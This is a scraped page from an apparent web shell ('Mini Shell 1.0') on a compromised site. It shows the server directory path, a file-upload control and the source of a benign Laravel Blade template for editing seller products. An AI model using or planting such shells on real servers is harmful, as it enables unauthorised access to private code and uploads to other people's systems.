HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/resources/views/seller/products/
Upload File :
Current File : /var/www/devs.lapieza.net/resources/views/seller/products/edit.blade.php
@extends('seller.layouts.app')
@section('styles')
    <link rel="stylesheet" href="{{ asset('public/assets/css/seller/products/create.css') }}">
@endsection
@section('panel_content')
    <div class="aiz-titlebar mt-2 mb-4">
        <div class="row align-items-center">
            <div class="col-md-6">
                <h1 class="h3">{{ translate('Update') }}</h1>
            </div>
        </div>
    </div>

    <form class="" method="POST" enctype="multipart/form-data" id="choice_form_edit">
        <input name="_method" type="hidden" value="POST">
        <input type="hidden" name="lang" value="{{ $lang }}">
        <input type="hidden" name="id" value="{{ $product->id }}">
        @csrf
        <input type="hidden" name="added_by" value="seller">
        <div class="row gutters-5 ">
            {{-- Left Panel --}}
            <div class="col-lg-8">
                {{-- Product Information --}}
                @include('seller.products.components_edit.product-information')
            </div>

            {{-- Right Panel --}}
            <div class="col-lg-4">
                {{-- Product Pricing --}}
                @include('seller.products.components_edit.product-price')
                {{-- Product Attributes --}}
                @include('seller.products.components_edit.product-attributes')
                {{-- Flash Deals --}}
                @include('seller.products.components_edit.flash-deals')
            </div>

            {{-- Buttons Section --}}
            <div class="col-12">
                {{-- Buttons --}}
                @include('seller.products.components_edit.form-buttons')
            </div>
        </div>
    </form>
@endsection

@section('script')
    <script type="text/javascript">
        const url = "{{ config('app.url') }}";
    </script>
    <!-- Script functions -->
    <script src="{{ asset('public/assets/js/seller/products/create/functions.js') }}" type="text/javascript"
            defer></script>
@endsection